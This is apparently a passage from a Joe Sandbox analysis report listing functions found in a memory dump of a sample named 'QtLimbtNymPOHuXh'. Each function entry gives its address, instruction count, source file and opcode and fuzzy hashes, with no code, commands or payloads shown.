                        • Opcode ID: 2262f2265bfcb80ea5f22fac05dc666adbf2445fafa1d8a0e4d7ed3284a8fc0e
                        • Instruction ID: 19ebc8172dcf11609b51a314d3064b16beaa4f39ff223f00b8d98e25859e8c23
                        • Opcode Fuzzy Hash: 2262f2265bfcb80ea5f22fac05dc666adbf2445fafa1d8a0e4d7ed3284a8fc0e
                        • Instruction Fuzzy Hash: 8AA1E030B09B4A4FE768EB6980A0676B7E1FF58300F55497DC08FC3AA2CB79B9458740
                        Function 00007FFD9BAD2284 Relevance: .3, Instructions: 277COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c91c7b833466c61006544cb18739559a3adbc5eb9f7e8d36a1929a2f444cad45
                        • Instruction ID: 268d36963546ad0e8320728835bfa087dc8f4faf300dbd38b33508f2370a2c81
                        • Opcode Fuzzy Hash: c91c7b833466c61006544cb18739559a3adbc5eb9f7e8d36a1929a2f444cad45
                        • Instruction Fuzzy Hash: E511A2A2F0F39B8AF67953E494351BC55405FC5324F1A07B6DC5E4A0E2DCCC2B819292
                        Function 00007FFD9BAD3E25 Relevance: .3, Instructions: 261COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f119586de86f23bd5d04043ccc4a02cebc848c1838b3ea81ba2d22018ec08b3a
                        • Instruction ID: d1881c25a3d3ef7466d058989a59640177fea0e1b7daeaca8c4d06e6bf7d2555
                        • Opcode Fuzzy Hash: f119586de86f23bd5d04043ccc4a02cebc848c1838b3ea81ba2d22018ec08b3a
                        • Instruction Fuzzy Hash: 7F717B62F19D4D0FEB99EB6C44B96B463D1FFE8360B140379E01DC72D6DE6968428381
                        Function 00007FFD9BAC0CB1 Relevance: .3, Instructions: 251COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fa195cb7d478a8ec7fc2cedb11bbdfe6e0951404fb580b459b3f5be9a486dbeb
                        • Instruction ID: f313144eaa46b3374cbcfb1fb1b4ec98cc11985d57b92b2b5114f345cc2d96b7
                        • Opcode Fuzzy Hash: fa195cb7d478a8ec7fc2cedb11bbdfe6e0951404fb580b459b3f5be9a486dbeb
                        • Instruction Fuzzy Hash: 6DA15070A1591D8FDBA5EF18C8A9AE9B7B1FF58301F5005E5A40DE72A5CA34AEC1CF40
                        Function 00007FFD9BAC09D9 Relevance: .2, Instructions: 250COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9bc7ef4edb2fa517f422d987aabdd30e6ec75b7445643c97aea8f3037aaf4475
                        • Instruction ID: 0709123aec5d5d6ec0b28d5248b9cdd88a8a90433e39f72aa73d33608e9270f9
                        • Opcode Fuzzy Hash: 9bc7ef4edb2fa517f422d987aabdd30e6ec75b7445643c97aea8f3037aaf4475
                        • Instruction Fuzzy Hash: CA91B670E1895D8FDB94FF68C899BA8B7B1FF18300F5045A5E00DE72A6DA34A985CF41
                        Function 00007FFD9BAD42CB Relevance: .2, Instructions: 229COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 116715468a4319dfd8bf777a75456affcbfdceddc0551a105b0ad322f0167dd6
                        • Instruction ID: 95121c01ef609939f57e4bcaf58f41eb5dcf6a56cbf1ab8bb214af03b003b044
                        • Opcode Fuzzy Hash: 116715468a4319dfd8bf777a75456affcbfdceddc0551a105b0ad322f0167dd6
                        • Instruction Fuzzy Hash: B4718030F1960A8FEB54EB68C465ABDB3E2FF98314F210179D059D72A6DF39A842C741
                        Function 00007FFD9BAD2A7B Relevance: .2, Instructions: 225COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ed4d4a0f7c0d4084ea40a7fc64eee1f026ea8ad41e951995305ac24215602f68
                        • Instruction ID: 7e5d90b9a20bdc9c4fd36d80fe234af37f4090a3f138ffc2bac2d77648aab4dc
                        • Opcode Fuzzy Hash: ed4d4a0f7c0d4084ea40a7fc64eee1f026ea8ad41e951995305ac24215602f68
                        • Instruction Fuzzy Hash: 1271A330E1D64E8EEB79DBE4C8656FCB7A0EF99310F5106B9D00ED71A5DAA46941C700
                        Function 00007FFD9BAD4508 Relevance: .2, Instructions: 222COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f65951d4a5198937ba18a4f294f0b2360f1ec9f84b440b57ea43ee72a616677b
                        • Instruction ID: b4682b3ef27fb565a1a025c70286a63051d71944c8a6b38f0ca5420509ab1db1
                        • Opcode Fuzzy Hash: f65951d4a5198937ba18a4f294f0b2360f1ec9f84b440b57ea43ee72a616677b
                        • Instruction Fuzzy Hash: 7F619B30B0EA0A4FD32D9B6CD4A54B477E0EF8531472506BED48FCB2A3DE18A9478781
                        Function 00007FFD9BACC63A Relevance: .2, Instructions: 215COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d86ae42f19d9f0b5b639232865cb43ad70073db544dc5043f12dc65402c667a8
                        • Instruction ID: 6380d4983d14cb0aa26dc687b3b04381f6e731fe1f6984832c9cadaf190eb7a5
                        • Opcode Fuzzy Hash: d86ae42f19d9f0b5b639232865cb43ad70073db544dc5043f12dc65402c667a8
                        • Instruction Fuzzy Hash: 82512631B1D69D4FF71DABA898612B877D1EB46318F2502BDC09BC7193EA5D684387C0
                        Function 00007FFD9BAD4538 Relevance: .2, Instructions: 202COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e58ff26fb9ab1b4280571209b4d25eca6c8951ab9e2380f67ff59cded7c2d38d
                        • Instruction ID: e5b0ed13e8c848e7dd71cf612123e385c84429d6fa4d0ce13e8b551f1501235a
                        • Opcode Fuzzy Hash: e58ff26fb9ab1b4280571209b4d25eca6c8951ab9e2380f67ff59cded7c2d38d
                        • Instruction Fuzzy Hash: 10510971B19D0D4FE768EB6894656A973E1FFD4360F41433EE00EC71A6EE7869024740
                        Function 00007FFD9BAD50C6 Relevance: .2, Instructions: 184COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df9e8b66e9af44a5816a2e486f17088ffbcb2a7c5bd8f971d3ecb042da780042
                        • Instruction ID: d1b47a89012100d71d326c87cd4b03ee0e12b7d05498edff0df1dcffb2881154
                        • Opcode Fuzzy Hash: df9e8b66e9af44a5816a2e486f17088ffbcb2a7c5bd8f971d3ecb042da780042
                        • Instruction Fuzzy Hash: F6515C31B0EA4A4FE7359BA898715B677E0EF81314F0603BFE45EC7193DE68A9458780
                        Function 00007FFD9BACB6D4 Relevance: .2, Instructions: 182COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a43907b6b87b9cb321ce984c600de8e7a3b053ed0f348d0bade83a7e04afd358
                        • Instruction ID: 79b739e5e714758f05724481175b06e38993646974f46d90a90bc4aac1177e1f
                        • Opcode Fuzzy Hash: a43907b6b87b9cb321ce984c600de8e7a3b053ed0f348d0bade83a7e04afd358
                        • Instruction Fuzzy Hash: F8519931B0FB4E4FE334ABA894611B177E0FF45310F56427ED48AC7193DE6AA9068380
                        Function 00007FFD9BAD4139 Relevance: .2, Instructions: 182COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d61b736accc4202212805c14b35ce18310e541678781e09b60e43e553ff221f9
                        • Instruction ID: 679f7180a2fa56127f72e27bcfd1d8682d01b8e650a2724654c2f5c5c975def9
                        • Opcode Fuzzy Hash: d61b736accc4202212805c14b35ce18310e541678781e09b60e43e553ff221f9
                        • Instruction Fuzzy Hash: 70518D30E0960D8FEB54EBA8C465ABDB7F2FF99304F210179D049D72A6DE39A942C741
                        Function 00007FFD9BACD10D Relevance: .2, Instructions: 176COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8c20d1341775a1e4e50301356a3bf1c96a9288c31ed193788e1d77263916188
                        • Instruction ID: d130f7b273d3178bde8ab6c5fad40a1a52626bb80126ff0e6344e65b6ecfe974
                        • Opcode Fuzzy Hash: e8c20d1341775a1e4e50301356a3bf1c96a9288c31ed193788e1d77263916188
                        • Instruction Fuzzy Hash: 8B618130609B0A8FD365EF64D1A46B173E2FF54300B91497DC08AC7AA6CB79F982CB40
                        Function 00007FFD9BAC1289 Relevance: .2, Instructions: 165COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b3c7b3ec4497a7a9a62e317111cf2e3312308f7c55e73c75c3a75a4ed07279a
                        • Instruction ID: 61cd9595d4aad6cfa56cdd20f01f6a0c9b50365fae016bb07a1bf450f3cf9d30
                        • Opcode Fuzzy Hash: 7b3c7b3ec4497a7a9a62e317111cf2e3312308f7c55e73c75c3a75a4ed07279a
                        • Instruction Fuzzy Hash: B6513D75E19A5D8FDB94EF98C465AFCB7B1FF69300F410169E00DE7292CA64A9418B40
                        Function 00007FFD9BAD1ADD Relevance: .2, Instructions: 156COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1fd71b65699ee4e3e3ebeaf59f7d08c2f79f89db6a0bf5aad5d740e56e51059d
                        • Instruction ID: 9d107b9dac56bec4a7d89b3f4254ed7d8181f2e2185540980d786d06f20064f7
                        • Opcode Fuzzy Hash: 1fd71b65699ee4e3e3ebeaf59f7d08c2f79f89db6a0bf5aad5d740e56e51059d
                        • Instruction Fuzzy Hash: 7A411631E0E68D8FDB16DBB8C8604AC7FB0FFA6314B1502FED049DB1A2DA646905C751
                        Function 00007FFD9BAD0DFD Relevance: .2, Instructions: 155COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad7f86dc342b5f2ceeb73a1add19ff88a024a745670e72ef47bd8204186e76fa
                        • Instruction ID: 691234159b0a203a0facd7063849f98b895a743784336a555ceca5c8c4ba213d
                        • Opcode Fuzzy Hash: ad7f86dc342b5f2ceeb73a1add19ff88a024a745670e72ef47bd8204186e76fa
                        • Instruction Fuzzy Hash: C7518230609B0A4FE374DB54D1A46B277E1FF94700B514A7DC48EC3AA6CB79B986CB44
                        Function 00007FFD9BACAC52 Relevance: .2, Instructions: 153COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae2d9a7bd983d4add78c987b63000c2da0b8f7e24246e2205d51168b81ed377b
                        • Instruction ID: b99c6f4511c4a56ef8a0b4ac668fea45d21ab47001eb5a80f613255b4eacb4ef
                        • Opcode Fuzzy Hash: ae2d9a7bd983d4add78c987b63000c2da0b8f7e24246e2205d51168b81ed377b
                        • Instruction Fuzzy Hash: 9541A562F1594E4BEB98EBACC8656FC6BA1EF44214F400279D41DD72EFCE242D42CB41
                        Function 00007FFD9BACAC69 Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 123d7d3ac4f350dfeea675169b8ac9d72cc563ec7e89d492686ae86e25c2bea7
                        • Instruction ID: 1fcf8f259f2dea3cbf8042866ec82b86cd9ffbb9b74c62af28737c5d44d57477
                        • Opcode Fuzzy Hash: 123d7d3ac4f350dfeea675169b8ac9d72cc563ec7e89d492686ae86e25c2bea7
                        • Instruction Fuzzy Hash: D7418362F1490E4BEB98EBACC8656FC6BA1EF44214F404279E01DD72EECE242D42CB41
                        Function 00007FFD9BAD1F72 Relevance: .1, Instructions: 142COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 30f1674532705446352ef15ab73d385c6c6e88d6941df06a806803d80f83a557
                        • Instruction ID: 50db22371f1e55ff911f4ec31e9d0373970cbbab830819f3bfd8eae7f6871da6
                        • Opcode Fuzzy Hash: 30f1674532705446352ef15ab73d385c6c6e88d6941df06a806803d80f83a557
                        • Instruction Fuzzy Hash: B441B230709A4D9FDBA8DF4CC865A6437D1FFD8311B1107B9E04DC76A6CA65AC45C781
                        Function 00007FFD9BAC0FDA Relevance: .1, Instructions: 137COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae90ee0956897d76952053c9f7943a553e31c168d15649c29f1f53e42a049a01
                        • Instruction ID: 2e479b342cacc87ab6f9059f6348ccc9410af2b5a248a91f7ec95762b0d89322
                        • Opcode Fuzzy Hash: ae90ee0956897d76952053c9f7943a553e31c168d15649c29f1f53e42a049a01
                        • Instruction Fuzzy Hash: 73415E71E1965D8FDB94EFA8C464AACBBF1FF59305F400179D009E72A5CB34A945CB40
                        Function 00007FFD9BAD44A5 Relevance: .1, Instructions: 130COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cbd4592c9dda210572febb1975a093caf845ca6c75a5b1dc982e5b4d75dd49e0
                        • Instruction ID: c3fcb2b15c796fd2f5cd5bc0e6e3033d10f228b0f9fe08705ad40f91965b4edb
                        • Opcode Fuzzy Hash: cbd4592c9dda210572febb1975a093caf845ca6c75a5b1dc982e5b4d75dd49e0
                        • Instruction Fuzzy Hash: 47413420E1D99E8EEB78DB9C84756F877A1FF94300F11027AD05ACB1AADD7869408741
                        Function 00007FFD9BAC66A8 Relevance: .1, Instructions: 129COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 45a619c1b6fa0f44785aacbee5b6f02681c95601464daa49bffce74ec692d461
                        • Instruction ID: 063079c2397d4c2ad794aa9295542d44333c399a7a40bcf543649a05956b2ae4
                        • Opcode Fuzzy Hash: 45a619c1b6fa0f44785aacbee5b6f02681c95601464daa49bffce74ec692d461
                        • Instruction Fuzzy Hash: 0B411A30E19A1D8FDB90EFA8C854AADB7F1FF58310F110579E409E7296CB74A981CB40
                        Function 00007FFD9BAD38C7 Relevance: .1, Instructions: 127COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8a99553f7487ac05b4fdc8b5d7f4d9fca74a443e45940b07ecfa5f400416d8b
                        • Instruction ID: 03ce5fe7c91db4c3b09e5e86e8ba6197eba9330c0a72baa10b3bfc709b69be27
                        • Opcode Fuzzy Hash: a8a99553f7487ac05b4fdc8b5d7f4d9fca74a443e45940b07ecfa5f400416d8b
                        • Instruction Fuzzy Hash: 9441353260D9488FDF9CEF58C4A59A8B7D1FFA9320B0406AAD05EC7196DE25E845CB81
                        Function 00007FFD9BAC4EF9 Relevance: .1, Instructions: 126COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 56a0d68af62d1521669089090610aacfda3ef312de9ef35374ab209f6fe833cd
                        • Instruction ID: ac624db7a9def3150e779419cc9e53aa4be977e6bc6995f771a1a2f59d378cbe
                        • Opcode Fuzzy Hash: 56a0d68af62d1521669089090610aacfda3ef312de9ef35374ab209f6fe833cd
                        • Instruction Fuzzy Hash: 1E413970E1464D8FEB84EFA8C8A5AECBBF1FF18311F0441B9E018E7296DA346941CB41
                        Function 00007FFD9BACB1B0 Relevance: .1, Instructions: 125COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbe0bad7748021c693c9ab0cf559d3026ad534dd8704533d23259ab2c4c42df7
                        • Instruction ID: c5dedd1e83bf3cee13b05e54102d7d5a16a48a399bc5ee519dff41e865b355cc
                        • Opcode Fuzzy Hash: fbe0bad7748021c693c9ab0cf559d3026ad534dd8704533d23259ab2c4c42df7
                        • Instruction Fuzzy Hash: D031A331F1DA1D4BE768FB9CE4666BC73D1EF98720F554179E00DC32A6DD6969024280
                        Function 00007FFD9BAD3971 Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 918810cf55805e89136c654905c778ef9ac23b641ff3e7696a58ff24072eb8f0
                        • Instruction ID: 8b2c7c357aa76df28a9456ac2bcff5fa13fb96db6914bbd24bddab1533cfb98a
                        • Opcode Fuzzy Hash: 918810cf55805e89136c654905c778ef9ac23b641ff3e7696a58ff24072eb8f0
                        • Instruction Fuzzy Hash: F731333260D9488FDF5CEF18C4B9E64B7E1FFA932470406AED05AC7196DE25E845CB81
                        Function 00007FFD9BAD390B Relevance: .1, Instructions: 115COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f0599b889ea193561097d38a87e7bbf553fb4031198a39139cdb54624bbabc8
                        • Instruction ID: 50acb7ae185ca23c1fb2408b37cbe48c3c52427bf6cff33ba50e442b365a3122
                        • Opcode Fuzzy Hash: 4f0599b889ea193561097d38a87e7bbf553fb4031198a39139cdb54624bbabc8
                        • Instruction Fuzzy Hash: AA31633260D9498FDF9CEF18C4B9EA4B7E1FFA931070406AED05AC7192DE25E845CB81
                        Function 00007FFD9BAD1B70 Relevance: .1, Instructions: 114COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3c09c1b6490791d2c326332a391f897c218b1ddfc63a30dd4d55733c0d9a2873
                        • Instruction ID: cac04a0ac5aaf4f1bda3a0fe5d848ea3a5a51a8ae2ec7ea0796beaa78f6a9ff9
                        • Opcode Fuzzy Hash: 3c09c1b6490791d2c326332a391f897c218b1ddfc63a30dd4d55733c0d9a2873
                        • Instruction Fuzzy Hash: B1310231E0EA8D8FCB55DBA8C8604AC7FB1FF9A304F1502BAD04DD71A2DA656A05C751
                        Function 00007FFD9BACF221 Relevance: .1, Instructions: 110COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 98b9f912c519e35ba75fa81b74cfebbfb74201dbb6f2ef4d5a90235e89ba5ce1
                        • Instruction ID: 88ecab397cfff2bd6054794ee6a3513256e168d5ef84bdc7bac8ab4c7ba7709e
                        • Opcode Fuzzy Hash: 98b9f912c519e35ba75fa81b74cfebbfb74201dbb6f2ef4d5a90235e89ba5ce1
                        • Instruction Fuzzy Hash: EC210635F0E91D4FEB74AB98A8269FC7BE0EF89360B160177E00DD31A1CF5A2A054381
                        Function 00007FFD9BACAF0E Relevance: .1, Instructions: 105COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dcba6cbadbc1d3055b9d5d6136a97e469127570262872e5c686a76380a791951
                        • Instruction ID: 17cd9513ded6a7b45521f6ce0154c48e97a61b269ba104f04ff4f39ba78c8296
                        • Opcode Fuzzy Hash: dcba6cbadbc1d3055b9d5d6136a97e469127570262872e5c686a76380a791951
                        • Instruction Fuzzy Hash: 4531F871E0890D8FDF94EB98C499EBD77F1EF68301F414179D019D72A5DA74A981CB40
                        Function 00007FFD9BAC4DCD Relevance: .1, Instructions: 103COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000C.00000002.1913993245.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_12_2_7ffd9bac0000_QtLimbtNymPOHuXh.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a7911c17e1b9209ef9d60b066d01c93ad1ff196a15d213201aeb892859c7db8f
                        • Instruction ID: fa3957de532bfdb16fb3312ce3ab6b88d7c4f90142650f8943167d566d242262
                        • Opcode Fuzzy Hash: a7911c17e1b9209ef9d60b066d01c93ad1ff196a15d213201aeb892859c7db8f
                        • Instruction Fuzzy Hash: E2416D30E1855D8FEB54EB98C865AEDBBB1FF58311F050179E008E72A6CE746941CB81
                        Function 00007FFD9BAD36D9 Relevance: .1, Instructions: 100COMMON
                        Download Yara Rule
                        Memory Dump Source
